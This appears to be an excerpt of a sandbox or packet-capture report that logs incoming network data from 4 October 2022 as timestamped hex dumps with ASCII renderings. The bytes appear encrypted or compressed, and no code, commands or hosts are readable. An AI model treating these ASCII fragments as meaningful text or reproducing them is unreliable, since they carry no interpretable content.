                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14056INData Raw: 14 b6 08 ab 61 a6 8b a8 bd b9 af 14 2e af 7e d4 fc 4f a2 2f d7 c0 12 90 a0 47 eb e4 a6 a1 46 e3 c6 45 b1 a7 27 ef cb 50 90 e2 54 c2 d7 01 6c b2 18 2c 43 39 a4 c9 5f 72 09 93 0d 14 dd 8f f9 b6 84 e2 03 3b 5f 23 04 6a 4b 13 69 33 75 2c 68 6f 43 d0 fe 05 ff 3f 64 83 a9 76 15 72 66 7c e7 dc 7f 15 23 f8 5f ba f7 3a 78 70 10 42 32 0e c9 5a 14 d1 0f d5 42 d0 66 39 17 2f 02 3e 18 9e 48 96 72 9b 04 49 ae fd 9c 9d 67 ad 0c 7b 61 89 26 6e e8 0f 15 dc 22 e8 ef 77 cc d6 9d 84 a4 8d 9c bb 40 a5 50 e7 c2 d0 2b 75 98 c9 20 92 31 36 e7 cc 8d e6 7a 0b e5 08 e6 fb dc 6a fc f5 8e 04 63 46 7c 91 ab 99 e3 eb 4d b2 41 2d 20 48 11 71 3a 98 3f ab 4d b1 d1 44 57 37 81 f7 22 b2 81 21 a2 56 e1 41 ad 84 52 aa 24 fe 63 e9 83 42 54 31 f3 f2 33 99 ae 0f d5 bf 26 f2 a4 de 17 bf 0f f2 9b
                                                                                                                                                                                                                                    Data Ascii: a.~O/GFE'PTl,C9_r;_#jKi3u,hoC?dvrf|#_:xpB2ZBf9/>HrIg{a&n"w@P+u 16zjcF|MA- Hq:?MDW7"!VAR$cBT13&
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14072INData Raw: 82 15 42 7f 44 bc 8d ba bd 56 bd a6 09 cb fc cc 90 54 59 90 3f 4c c4 7e 76 b3 d4 61 b9 82 ca ce 4b ef 40 36 57 1b 3d fa a9 4f 2d 15 f3 57 35 c8 1b 78 7f d2 6e 2d f2 c6 ac cb 9d ad ff c8 3e b7 18 fa 24 bd c2 db 69 9c e6 99 60 61 ee 29 6c 4e 50 89 cc ed 43 96 21 08 0b b1 ec 67 f9 da a0 e9 8e c0 21 31 7f 7c c7 d8 2a b0 5e cf 0b 78 0f e7 43 17 e1 25 64 4e 7d a7 54 41 82 c4 65 69 ac 86 fb 52 c9 e7 59 fe 26 cd 6e c7 81 1f 1c f4 25 47 21 45 54 59 00 49 80 7c 4a f6 84 07 b2 ac aa ca 28 63 39 af 71 e0 a3 2a b7 84 13 b7 fc 0b 19 bd 9a 50 6c 60 ea 08 6b da 13 4d 1d 2c 4c 25 27 17 7f 52 b9 ab 66 50 21 5f d1 84 fe 46 1b b9 c7 bb aa fa 5c e2 10 ce 3b ea 9c ab 4d 86 5b f3 73 af 51 44 91 77 05 58 13 94 29 07 f0 a9 ed 0b 75 25 8d c5 8f cc 2f a2 a3 56 da 92 94 ff 17 1c 8c
                                                                                                                                                                                                                                    Data Ascii: BDVTY?L~vaK@6W=O-W5xn->$i`a)lNPC!g!1|*^xC%dN}TAeiRY&n%G!ETYI|J(c9q*Pl`kM,L%'RfP!_F\;M[sQDwX)u%/V
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14088INData Raw: ef c6 0c 73 55 ea a3 35 f0 20 f3 12 7e fd f0 a1 6b 9f ad 9e da 41 48 aa 1f e6 de d7 5c 4b ce 38 54 bd 59 df 3d 80 32 38 e1 5c 8d 70 67 74 04 b7 64 0b de b4 3a 76 1e 78 81 e0 c1 0e ca 46 76 6e f5 e7 21 6b b0 78 18 2e a1 44 e9 65 5e 19 9a 34 fd 78 52 e7 d8 ee 41 f0 ac 2c b7 de 1c a3 3a 26 08 35 39 d0 50 ac 65 e6 0d ae 22 db f9 70 53 51 c5 1a e7 b7 1e d7 c2 67 50 9e a6 5f 0c ce b9 da 26 36 ec 22 c9 75 ec a5 c0 e6 fc 1b 27 82 ad db 08 09 cf e6 f8 f1 79 99 44 4d 4b 34 8c 6f 06 82 cd ee 14 16 c1 82 6c 80 f8 a0 67 09 ff e6 0f f1 6d 84 f4 8e 14 46 bd 69 48 bb 8d 20 5a e1 f8 43 5c 00 fe a7 9e 21 a3 4b a6 8e 24 a1 98 c2 59 a1 8d fd e1 5e de b4 92 ba 1a dd 23 60 c1 ef 6f b4 b2 e5 c9 20 b6 11 b8 6d 6a fc 5c e2 86 97 44 3b 04 85 3a 5c 58 f0 67 eb 0d 9e c7 7e b5 31 b3
                                                                                                                                                                                                                                    Data Ascii: sU5 ~kAH\K8TY=28\pgtd:vxFvn!kx.De^4xRA,:&59Pe"pSQgP_&6"u'yDMK4olgmFiH ZC\!K$Y^#`o mj\D;:\Xg~1
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14104INData Raw: f1 6a 8f 48 69 e6 5d be 6f ff ef 35 ff e1 ec 23 10 83 3e f9 a7 2f 38 3c 76 55 4b b3 92 bf 22 7c 94 bb 65 e7 43 a5 53 b6 b8 2e 27 20 83 5d 23 2c 45 e4 e6 ee ef c9 01 40 63 da e1 f7 b4 af 73 ad f6 0c c5 6a 22 4e 45 07 a7 38 0f 3d cd 66 7d 09 ce 07 de 8a 28 11 07 02 00 ec d3 80 91 07 d0 93 1b 5b 41 46 f0 d0 33 00 59 bf 5e e3 c2 d7 e4 85 cd 66 83 d0 5d 35 e9 9b dd ee 9e b5 90 0a bc 72 b9 e0 d0 f1 1c 72 30 73 f9 b2 05 b7 81 90 64 53 42 b8 29 99 fc f1 b4 9b 20 e6 07 4e 90 63 d2 08 5b ff dd 91 93 14 0d 84 7b 6e 8b 3b 56 21 1a 3e 19 88 f8 3b f0 8b ea ae ad f2 b7 c6 58 58 69 8c 00 c3 9c ee 61 4e 59 ca d7 df 31 89 ef 4f 0d 24 22 58 e7 29 fe c5 1c 50 1a 8d 2c 63 af b7 ac ae 2b 3a 8c dd 5d 87 21 35 be 3e b3 1d 4c bd 2d 9d 03 93 88 cb 7d c6 4c e4 7a a0 a1 27 6b 7e 78
                                                                                                                                                                                                                                    Data Ascii: jHi]o5#>/8<vUK"|eCS.' ]#,E@csj"NE8=f}([AF3Y^f]5rr0sdSB) Nc[{n;V!>;XXiaNY1O$"X)P,c+:]!5>L-}Lz'k~x
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14120INData Raw: 55 ab 21 2a 00 a8 c0 f8 f8 06 b7 46 3a ca a6 58 87 db dc 6b 6e 57 f2 d2 07 a6 9a b6 5e d1 05 c7 05 55 4d 0d 34 5b 86 ef 4c 96 78 0c d4 aa e5 dd 6b ed c8 0b e0 5c 37 2d 95 08 c8 04 fe be 51 55 f0 6a ef ed ae 14 cc df 4c b3 24 ef db 12 6e 82 95 cc a6 1d 7e 61 e6 d8 1b 2d 5a 2d 39 a0 79 ea 24 a1 16 95 85 72 04 a3 9c 8f 79 b6 91 74 30 b9 52 09 85 c3 c7 dd 44 24 f0 39 44 1c 4d 91 5e d4 80 12 1d 93 68 41 21 62 4f ac 78 af 4b 1d 3a a6 3e 44 09 5e bb 0d cd 29 02 eb 7e e4 66 45 4b d8 b6 86 6c dc 56 4c 1d f8 18 ee 0d 06 be 75 eb 7a 73 b2 1e f5 f2 d7 8a 22 a5 d7 6d ba 34 fa 35 63 95 d4 f6 be 49 9c 58 4d b6 16 0d 7a a9 fc 18 eb 12 79 1e 01 d6 ef 10 14 6f 84 c0 52 e3 44 fb 8d 9f 7c 95 20 6f 11 3c 14 0e a1 7c 52 30 ea 94 ce 43 c1 dd dc f1 1b bf bc 80 c9 3d 93 a9 e2 5e
                                                                                                                                                                                                                                    Data Ascii: U!*F:XknW^UM4[Lxk\7-QUjL$n~a-Z-9y$ryt0RD$9DM^hA!bOxK:>D^)~fEKlVLuzs"m45cIXMzyoRD| o<|R0C=^
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14136INData Raw: 35 76 fe 23 6f 3f 8c 11 25 9b d2 c2 b4 75 3b 7d b5 cf fa 2f ae 97 fc f3 43 00 bb b3 24 a6 45 62 be 3b 26 e8 8a b0 1d e3 a5 48 88 97 81 79 74 2c 18 a5 40 d2 f4 7b 92 71 cc 47 69 95 b0 ab 99 1a b9 ea 0c 7e b4 e5 11 18 71 48 75 b4 69 f3 67 0e a9 9b ee e2 2a ea 77 be b8 2f e1 10 0b 68 cd 4d 9b 28 b9 38 79 e1 b5 52 85 e9 df 8a 4c a0 e0 44 fc 49 52 4c 10 0c 69 a6 9f 3e f4 7a 8e 6c f9 84 d0 e6 87 f9 f8 e9 cf 20 ef 18 68 ae dd e0 f8 5c e3 fd af 85 8f 5c f3 53 b5 1a a5 a1 34 48 3e e3 b0 41 31 40 46 2c a1 ad c0 54 54 3c 56 20 24 e6 3d bb b3 05 e5 86 38 0c bb 13 00 fe c1 57 d6 2e 2d c5 c3 60 46 db b8 e6 a3 e9 54 96 c6 fd ed ef 75 cb 8c b6 b4 9e 20 4b 9d 41 93 de 6e 80 c3 c5 e5 31 a3 12 9b 47 57 33 22 12 95 c7 2e 6b 2c 89 80 71 f1 84 bd ff a8 43 d7 f1 d5 2b 0e 90 88
                                                                                                                                                                                                                                    Data Ascii: 5v#o?%u;}/C$Eb;&Hyt,@{qGi~qHuig*w/hM(8yRLDIRLi>zl h\\S4H>A1@F,TT<V $=8W.-`FTu KAn1GW3".k,qC+
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14152INData Raw: 85 b6 d8 ec 38 fc f5 c7 00 aa a4 a8 f4 5b c6 ea bf 96 2f ef a4 c6 3f a8 58 77 5c 1c 9c 97 3f ae 7d 4b 37 c1 8e d8 e4 29 7b 81 93 fe 20 f8 53 1b a1 9e 80 f9 09 b9 1e ef 18 f9 73 01 14 1f 49 74 2e ea 0a a0 b2 0b c1 9e 15 40 ab ed d2 4c 0a ac 64 c8 0b c1 ae 53 8c 95 e8 34 14 84 6e eb 4d 9d bf dc 7c 9e f6 7e 5f 39 9d 71 2d 0f 9d af c4 f0 a7 82 38 84 d1 b5 4c ec 66 07 44 57 a2 d2 d6 2f 64 32 fd cd e5 d4 06 63 c1 72 c4 ed 4b 95 4e 3a c2 c8 67 ec 5d cd 00 8e bd c3 f7 d5 3e 8c 57 78 f7 27 9d 7f 19 13 99 13 5b 21 ac 6a 25 f9 75 91 b8 c6 1a 70 45 f4 38 e2 5a f2 d0 96 9e bc de 42 90 e5 eb 7d 02 15 24 16 9c 86 2a 52 c0 af 5a 51 66 19 17 5d ef 72 cd 07 ec 4e 52 05 72 3d 3e f3 4a 1b 16 a6 27 10 4e 35 ac dc 14 58 57 cf 5a a5 79 f7 78 fe 55 91 80 8e 82 28 70 22 b1 82 7d
                                                                                                                                                                                                                                    Data Ascii: 8[/?Xw\?}K7){ SsIt.@LdS4nM|~_9q-8LfDW/d2crKN:g]>Wx'[!j%upE8ZB}$*RZQf]rNRr=>J'N5XWZyxU(p"}
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14168INData Raw: 57 12 56 64 73 18 d8 01 be a5 42 50 17 e4 ac be a7 cd aa 92 5a 49 dd 77 f2 c3 b9 ac ed 75 56 f7 5c 23 7a e3 39 71 79 d0 e3 54 7d 96 45 15 b0 f5 d2 7e f2 ea 34 e5 76 e0 3e 59 38 3f 8a fa 5a cc e3 1a a6 73 4b 4f 85 67 0e 9a 53 2a 35 07 1c 1c 93 3e 86 e1 4e 5f e2 66 db 53 26 14 05 10 cc c7 13 c7 2e 7e cc 2b 95 d0 09 70 38 75 87 56 dd 29 74 ef 11 91 cd 61 c7 04 7b 64 9f a4 e3 10 3f 0f 05 14 38 a8 12 5d 5c 2f 1d 93 4b 05 dc 51 5b 98 2c 70 28 4f e0 06 92 93 84 14 2e 69 60 78 f4 71 bd 88 ea f5 83 6b be 37 f5 e8 03 15 de d9 59 a3 ba 0e be c7 29 19 08 dd 06 98 ae 74 73 2f 32 58 23 f9 06 8a 77 8b 4b 90 20 09 c3 51 02 71 3f 65 dd 93 41 38 1d 39 21 d6 5f 38 46 07 02 9c b7 9e c8 f7 53 49 76 cb f4 66 e7 bd a6 fe a2 38 6b 40 d0 92 c7 67 b6 3d ea d4 66 79 d0 27 bb 0a 01
                                                                                                                                                                                                                                    Data Ascii: WVdsBPZIwuV\#z9qyT}E~4v>Y8?ZsKOgS*5>N_fS&.~+p8uV)ta{d?8]\/KQ[,p(O.i`xqk7Y)ts/2X#wK Qq?eA89!_8FSIvf8k@g=fy'
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14184INData Raw: f6 e2 bc 9e 26 41 c6 9e 76 d1 ed 50 8b fe b1 09 ec f0 6a 41 c0 0f 8d b7 00 9c a2 16 3b b6 f6 7a 41 6d 41 3f e5 e1 b9 40 03 43 4c 5c dd bd ab ce 85 85 f1 52 a1 34 72 1c 6f c8 fc 49 df 96 3e 8b 22 2a bc 83 c2 66 32 67 b2 a9 34 0b 81 20 8c a3 f8 b5 c9 0a 73 26 2b 02 39 bf 51 7d 8d 23 10 2d 08 d6 e7 69 23 2c ef 87 31 bc fb 52 4c ca 46 5e 14 d6 70 d1 f0 41 fb 31 5b 49 be 93 0e a9 10 9a 75 57 d6 55 20 f3 4d 85 f3 fb 5e db 86 ee 25 d6 be b2 b5 76 25 ce 49 cf c7 20 dc 7e b2 9b fd 81 56 7a e5 41 2d c4 f5 ba bc c1 4b 1e 67 03 fd e7 fb 40 b4 b5 4e 3c 75 85 df 96 6f e2 e7 94 8e 47 8f 2e 87 6d 82 ce 78 7b c4 4a 2d 39 bd d1 e1 a5 94 9d e2 ea 23 7b 50 ae 12 f1 50 cb 6a 64 37 3b 26 9f 74 0c 19 b9 9d 93 e2 82 7a 61 3a e0 4b 31 df d2 34 d1 03 93 c2 80 d8 b6 6f bf ce 5f 89
                                                                                                                                                                                                                                    Data Ascii: &AvPjA;zAmA?@CL\R4roI>"*f2g4 s&+9Q}#-i#,1RLF^pA1[IuWU M^%v%I ~VzA-Kg@N<uoG.mx{J-9#{PPjd7;&tza:K14o_
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14200INData Raw: b0 e9 7d c9 85 0e 98 b8 05 ba 1e 9b e3 b5 15 73 dd 00 e1 ea 6a 9f 3f 02 be c5 35 c1 99 89 18 ec 6e 89 94 03 ab 20 43 82 1e f8 99 fc 7e a2 41 f1 e4 00 d6 4d 42 9f 0b e4 ee 8f 76 9b 0c 4c eb 59 40 e7 11 36 e3 90 17 da db b8 e5 df fd d7 85 00 9b a0 3d 3c 4b 9c 15 8d 6f 17 b0 7e 1a 78 b5 6f 47 8f 5d 0b 88 cc 6d 5d 9d a7 ef 11 1a 90 65 2f b4 45 dc a7 55 dc 51 96 f1 29 53 b1 e3 41 cd de b6 ea 0b 8e 30 38 10 20 22 47 69 4a 67 d0 fe 91 bf 91 00 5d a7 1b 14 a6 e5 52 7e c9 64 80 a7 6e ec ef f1 cd 23 33 8b 49 b2 a8 38 17 91 62 29 58 4e 5e 7c 87 67 88 aa d7 4c c7 24 b9 5b 7d 30 96 44 7c 52 38 30 d1 1e bc 2e 52 7e 5e aa 44 98 71 3c 53 62 6f b0 91 34 a2 3b c1 04 b2 63 e0 23 01 56 5f fa 22 2d d6 a8 dd 78 cd 6f 4e a3 b1 55 7e f9 5c 30 aa 23 c7 15 ff 3b 96 34 24 99 8d 22
                                                                                                                                                                                                                                    Data Ascii: }sj?5n C~AMBvLY@6=<Ko~xoG]m]e/EUQ)SA08 "GiJg]R~dn#3I8b)XN^|gL$[}0D|R80.R~^Dq<Sbo4;c#V_"-xoNU~\0#;4$"
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14216INData Raw: fd 45 bb 60 84 a3 e1 4d 42 8c 59 d0 f6 81 1a 6b 94 b5 41 00 0b 82 3c fb ae 75 2e 46 b0 8c e0 c6 5f 1a 05 b7 8d 01 cb f2 03 44 41 09 eb e7 14 66 ee a8 74 6a 87 6b e3 01 c2 02 f1 35 b7 e0 5b e5 99 6d 8c 23 a6 8b aa 2b b8 18 2d db 6c 94 6d d7 b5 7b f4 08 6a 92 e9 42 a0 e0 ca 27 ac 4d ee 23 a2 fa a0 15 52 ad 83 b0 13 45 4c 64 e7 eb 46 9e 07 a9 47 3c a5 35 50 c9 42 62 e6 71 79 68 3f 40 d1 bb 35 08 72 03 6a 99 70 c1 4f 34 14 2b 41 b3 d9 30 6e 77 43 ce de 47 12 22 ba a9 aa f6 58 89 d3 fa fe e0 99 fa d4 83 7c 3c 71 10 31 07 a3 b1 a5 4b af 52 18 27 e5 48 53 af b0 4e d4 ba 34 b4 5b 10 dd 21 98 70 39 93 d6 21 4c ea d3 75 e1 86 96 b1 05 a2 12 0f fb cc 17 90 c1 87 88 82 84 a3 57 1e 9d b2 c5 53 6e 7d 7a 09 23 bf f8 f4 0c 1a b8 e1 f8 dc 47 d0 8c 98 9b be 89 56 6c a6 30
                                                                                                                                                                                                                                    Data Ascii: E`MBYkA<u.F_DAftjk5[m#+-lm{jB'M#RELdFG<5PBbqyh?@5rjpO4+A0nwCG"X|<q1KR'HSN4[!p9!LuWSn}z#GVl0
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14232INData Raw: 0c b6 a1 cc a0 47 a7 95 12 d3 e7 6c 65 d5 57 fb 69 9c d5 60 d2 43 f6 ac b1 af 0e 70 fb dc a1 45 9f 34 da 7c e8 8d b5 be 78 71 d7 d6 e3 7b 8e 0a c6 61 5c b4 1b 2c 8d 2f a3 4c e8 04 1b 96 b4 b5 2d cd e2 b6 77 25 e5 3a 68 c2 67 5b 42 44 03 7d f7 ba b5 14 f9 66 dc 58 80 dc f2 37 76 8f 1c af d1 6c 1d 85 67 37 2e 11 cc d3 5f 34 e7 f7 21 03 1e 9e b9 7e 38 1e db 07 19 44 83 17 e7 06 51 01 d8 de 8d 12 56 16 1e c9 18 12 b7 35 ae 07 ab de e6 4a ca 92 28 92 1c 50 31 2a d1 50 c7 60 e2 d3 d4 58 c1 ae ed f7 b3 8b f6 d3 18 ba 96 9a 45 8d eb 0e 80 4b 15 23 35 80 5b 56 4c 45 6d a7 99 c7 b1 7d 3f ae 04 d8 fc 6d 27 d6 42 63 3e 10 84 30 36 eb 36 b2 d6 1c 15 9c b1 a5 5a d5 18 75 c9 39 59 f1 c6 44 43 11 c8 f1 8f 15 40 03 3f 97 7d a5 24 21 c9 71 e6 f2 54 cf d4 fb 9a ec ff 19 cf
                                                                                                                                                                                                                                    Data Ascii: GleWi`CpE4|xq{a\,/L-w%:hg[BD}fX7vlg7._4!~8DQV5J(P1*P`XEK#5[VLEm}?m'Bc>066Zu9YDC@?}$!qT
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14248INData Raw: b5 e0 8b db 36 77 b1 57 40 ad fb 5e 5c 28 34 a3 db 29 76 61 ff fb 07 e1 d5 0e 87 db 1c 3d a3 04 6d d8 6a 68 28 20 6b 3c 6f 1e dd 10 44 a1 79 60 7c 89 47 aa ba 6d d9 12 9e f1 49 d7 50 83 31 63 f5 e9 93 9e a0 0b 13 36 e9 bb 1b 86 b9 7e 45 95 34 20 f6 4a f6 cb ad 64 7a 19 83 34 40 3e 7e 48 f8 25 9c 4f e6 d6 d5 0b e3 d6 11 f9 fc 45 91 9d e0 0b 6b 87 12 9d d9 e5 d8 eb 8c 20 c5 c0 56 d4 6f d9 72 51 01 eb 9d 49 e7 43 f0 32 68 8a 12 43 7b 46 74 44 88 ee 9e a8 21 62 9d a0 b4 22 d0 be 0f 58 4d b5 f6 ae 81 25 6f c9 79 ab 36 6d b8 86 8d aa e3 8a 01 53 d6 d8 d3 a3 40 51 cb 25 af 3a fb 1b 23 91 b5 f1 79 0b 74 e9 65 89 2c 98 dd 53 6a 96 13 70 eb 7f 42 f7 29 7b 18 fb 4e 8d da 46 af 6c 71 18 7e 99 17 e0 41 5d 17 e2 4c 0b 02 de e2 62 55 15 ec dd 68 6f 50 9c 64 20 fe 01 57
                                                                                                                                                                                                                                    Data Ascii: 6wW@^\(4)va=mjh( k<oDy`|GmIP1c6~E4 Jdz4@>~H%OEk VorQIC2hC{FtD!b"XM%oy6mS@Q%:#yte,SjpB){NFlq~A]LbUhoPd W
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14264INData Raw: 44 b0 98 00 d6 60 7a 1c 81 6c 94 49 43 ec f7 4b 71 64 fb 71 85 9c 1e a3 fb 28 41 8d e9 79 f9 d7 bc 03 96 bf 60 46 f1 4c d8 d2 93 c4 1e a4 6c e7 5b 16 4c d0 3b 30 73 a4 94 32 6b 60 41 2f 73 20 9d ef 19 eb 09 f6 48 aa 99 e8 2f fb 9b 59 b8 eb aa 1d 89 e7 a1 2e ba d9 cf f0 b6 7f b9 eb 1e b1 46 99 55 56 a3 d7 e9 95 69 41 d0 35 7e a8 af 17 4b 49 65 26 5d 4c 4a 48 64 06 e3 02 90 c3 08 e7 54 dc 56 16 09 00 95 bf d8 13 19 17 19 90 08 0d 64 c2 9e 5f 15 48 69 24 cc 1b 1e 9c a3 81 4e bd 15 9e 79 34 9b 5e 58 d3 63 7b fb cb 0a bd c4 e4 62 81 96 55 73 fc 87 cb d3 e0 31 97 f5 f7 ae 4a 4a 5e 3a 86 68 f1 06 dd ab 28 f9 43 f8 17 51 4b 81 28 61 05 73 59 9d e9 62 45 7f 07 81 65 2e 36 a6 b5 d1 c8 f3 9b 4a 41 c1 14 53 c2 88 4d 80 af cc a8 f7 75 66 7f 88 5b 8d 78 e1 9b 45 0b 0c
                                                                                                                                                                                                                                    Data Ascii: D`zlICKqdq(Ay`FLl[L;0s2k`A/s H/Y.FUViA5~KIe&]LJHdTVd_Hi$Ny4^Xc{bUs1JJ^:h(CQK(asYbEe.6JASMuf[xE
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14280INData Raw: bb 6d 3b 9b d8 d4 a6 ae 21 ef 87 28 88 d5 e5 56 00 5c 2e b0 92 ab e8 fa f1 98 31 bd ab 5d f7 de 1f 77 38 c7 1f fb 8f 14 ea 8b c6 07 cc 90 8b 49 e6 da 49 91 de 69 79 ec 8c 3c bb 02 a9 92 95 66 f5 d5 df f5 91 03 c1 e3 25 39 f3 76 f8 fd 71 58 33 b2 94 22 86 95 10 d0 b5 c5 67 a1 f6 aa 13 f5 6d 3a ad fd a9 68 15 10 ac b9 c0 ae 5d 31 36 37 19 fd ef d1 03 83 0f 9f 2e fe 01 58 2b f3 4d fb 9e b7 bd 25 1f d6 7b 3e f7 8e af 5f 2a 88 8e 24 73 1d ba 5d 16 fb ef c5 99 1a 2f 4f 08 f1 30 db b8 da 22 e4 be 35 76 c7 2d 86 4c 54 bc 68 38 c4 b5 8c 1f a4 85 7d 2c e8 3d 5d 24 ac 86 f1 fa f0 5f 5b 60 49 12 e9 dd cf 0b ec 7d 68 b0 85 8c 69 b0 f4 4b 37 4e e4 8b 8d 9f b4 bc ba 61 ba 6e 9f 97 0c 98 c0 81 d4 ab 57 f6 58 68 b8 31 6a 16 c9 f3 7e cd 54 a7 bb 26 db 17 bf 96 eb 59 59 39
                                                                                                                                                                                                                                    Data Ascii: m;!(V\.1]w8IIiy<f%9vqX3"gm:h]167.X+M%{>_*$s]/O0"5v-LTh8},=]$_[`I}hiK7NanWXh1j~T&YY9
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14296INData Raw: 7c c1 a4 66 69 84 3c 83 52 f6 ef dd 8c aa f9 5a 2a 26 87 2b 55 73 98 c5 6a 51 96 d7 cb db 43 74 50 84 5c ad bc 0e 39 24 6a ca 1d 63 3e 7a 3b 0c 9e e8 32 09 6e fe 7d 69 d9 bc ee a0 b2 5f 99 d6 d1 5b c3 e1 96 0f 12 3a 20 1b 5e 5e 47 36 48 f6 f5 25 b6 ab 06 25 73 18 65 51 8f f9 af d7 fe d6 d1 07 62 d2 fd d2 47 dd 66 cf a9 78 2d 63 d9 81 99 61 bb 0c 87 eb e4 28 bb d7 7d 2a 29 cb 52 36 48 09 4a f5 44 12 fa b5 1d 18 1d 88 d0 98 91 9f a5 17 a3 85 87 8f 2f 24 b5 3e 53 fa b5 ea 37 c3 31 e6 2d 18 28 a6 69 e2 20 8f 18 25 42 63 a6 bd e0 e1 a4 f3 50 8b cd d5 d4 38 8b b7 28 c4 4f 04 27 d1 ca 1a 3c bf 38 58 29 cc a4 f7 c1 e9 9e 8a 29 87 89 7b 51 70 05 3a bc 3c 5c 32 89 d9 d6 d8 0b 08 e0 0d a8 98 49 6b 53 87 27 ea d6 57 34 33 09 d0 53 9d 2e 03 10 4b 97 1d 69 23 f6 7d c1
                                                                                                                                                                                                                                    Data Ascii: |fi<RZ*&+UsjQCtP\9$jc>z;2n}i_[: ^^G6H%%seQbGfx-ca(}*)R6HJD/$>S71-(i %BcP8(O'<8X)){Qp:<\2IkS'W43S.Ki#}
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14312INData Raw: b9 5c 8d c1 11 59 bf a8 7f 5a a0 c1 75 cc a8 9e d5 80 a8 70 a1 11 1e fa 74 82 c1 1f 33 cc 30 b8 31 64 6b 71 a9 2c b6 72 c7 ed 58 a8 d7 2a d2 86 d2 69 d5 fb 1e 15 e6 e9 4f b5 17 88 06 6f 50 30 3c 92 48 7f c1 9f 81 a6 ad 82 99 dd 56 9b 14 b8 38 72 51 cd db 9c 63 08 b4 1a 9b ea 6d f4 e0 dc f1 a1 86 3e 5d fb 7a e1 1f 29 60 1f 25 89 42 4f 62 2e ae 64 bb 96 7c 23 d1 8a 1d a5 50 4e 5c ac f8 fe ab 3a 38 fa ae f5 7e 02 b0 78 e0 25 d3 be e6 7d fc 2d c5 54 33 83 98 f1 84 56 0e 50 87 ae ef 4e 69 ca b9 31 c5 80 65 ac ca 24 5e 14 45 2a bc 35 b3 5c eb 45 de ab 04 b8 3d 8b ad ab bf 66 81 c2 94 45 52 df 8c 38 61 1c 9d 37 a8 e0 c5 0a 95 c7 4e 9b 8b 0d f0 b4 49 d5 a1 4e c5 fd a6 0c 02 7a 1f 7d 67 b5 5b 08 f4 19 44 8c d8 13 d0 cc 68 94 d7 bc 33 d0 ae fd 57 10 df e8 d5 a1 72
                                                                                                                                                                                                                                    Data Ascii: \YZupt301dkq,rX*iOoP0<HV8rQcm>]z)`%BOb.d|#PN\:8~x%}-T3VPNi1e$^E*5\E=fER8a7NINz}g[Dh3Wr
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14328INData Raw: 7d 0c 66 1b c7 28 a5 cc 32 f1 45 a4 c7 24 5a 56 27 59 7e 80 4e c2 5b b5 57 5f fd 82 5f 3f e2 94 f1 87 f1 db 8c 0d 72 cb 5c cd ec a6 9b 5d c1 45 8d 19 6a 27 ca cd 42 82 a6 a6 c1 fb 73 45 9e 49 25 c6 ec 9d 51 06 8c 07 d0 cd c4 c7 14 d5 ef 62 82 ea 16 ac 87 6f 82 ae f5 b0 78 e3 21 3f 20 47 30 66 c9 5e eb 3f 30 3c 68 95 72 aa 34 1a 81 d8 b8 6f b8 2f 9d ee 77 93 a3 0b 5b 9f 6c e8 ee 99 11 0c 47 51 21 fd 09 be ea 02 51 84 5b 81 e7 85 db d6 e1 ce 49 21 16 99 f2 e9 5f 1c df 8e 57 39 c6 57 f6 99 bf c1 be 8a 09 27 69 49 3d 09 f9 1e f6 cd f2 2f b5 5e 39 88 83 68 05 c3 f1 f4 8d 27 11 37 97 e8 f1 40 99 c3 a1 07 30 f1 ec 5c 27 28 12 af d1 e0 b4 3e 75 e6 90 33 dc e5 6d c4 1f c2 f3 02 75 b5 c6 2b 84 60 66 c8 01 00 c0 2c f8 32 63 a8 36 39 1a b3 b1 f5 5a 8c 01 30 ae f9 f0
                                                                                                                                                                                                                                    Data Ascii: }f(2E$ZV'Y~N[W__?r\]Ej'BsEI%Qbox!? G0f^?0<hr4o/w[lGQ!Q[I!_W9W'iI=/^9h'7@0\'(>u3mu+`f,2c69Z0
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14344INData Raw: b8 0b 03 2d 39 f6 70 7a 38 51 39 2a 95 28 c7 9c 75 f1 ec 8b 32 22 73 af 3b de 22 57 99 66 79 15 c2 06 01 21 17 6f 69 0b 49 e2 40 f5 72 b1 4e 27 bb 59 d5 74 93 e0 1d 87 27 0f 31 6f da 1a a6 1f 99 6b 4d 0b cd a4 08 96 07 ea af 80 0a 38 1b 7c 16 e1 0b 00 04 04 59 c7 e0 83 86 30 c6 66 c2 64 af 03 fe fa cf f3 3a 56 15 3e 0f 48 fa 7a 1a e6 66 22 bd 87 84 44 8c cf a0 35 77 06 84 3d 43 ce d4 5e f3 8f 53 70 1c b9 74 72 1b e2 f6 d7 4c 60 cd fb b7 00 86 09 37 0b 34 b5 f9 43 d5 2a ab 65 d2 9b 6b 94 86 83 71 a7 51 2b c1 e0 c5 a6 f2 b8 ab fe 27 02 ff e6 49 65 65 96 55 c3 ad 44 cf 91 c6 7a 57 a5 70 3f 47 dc 72 3d 7b 4a 47 27 88 86 4b 59 f2 a8 7c 91 4e 99 40 8d 82 03 80 28 dc 0a 70 44 29 bb 56 7f 3e 02 d2 c3 2e 8d 41 11 fc 10 63 d1 99 2f 22 f1 9c 3e 29 9d cc 7b 21 12 30
                                                                                                                                                                                                                                    Data Ascii: -9pz8Q9*(u2"s;"Wfy!oiI@rN'Yt'1okM8|Y0fd:V>Hzf"D5w=C^SptrL`74C*ekqQ+'IeeUDzWp?Gr={JG'KY|N@(pD)V>.Ac/">){!0
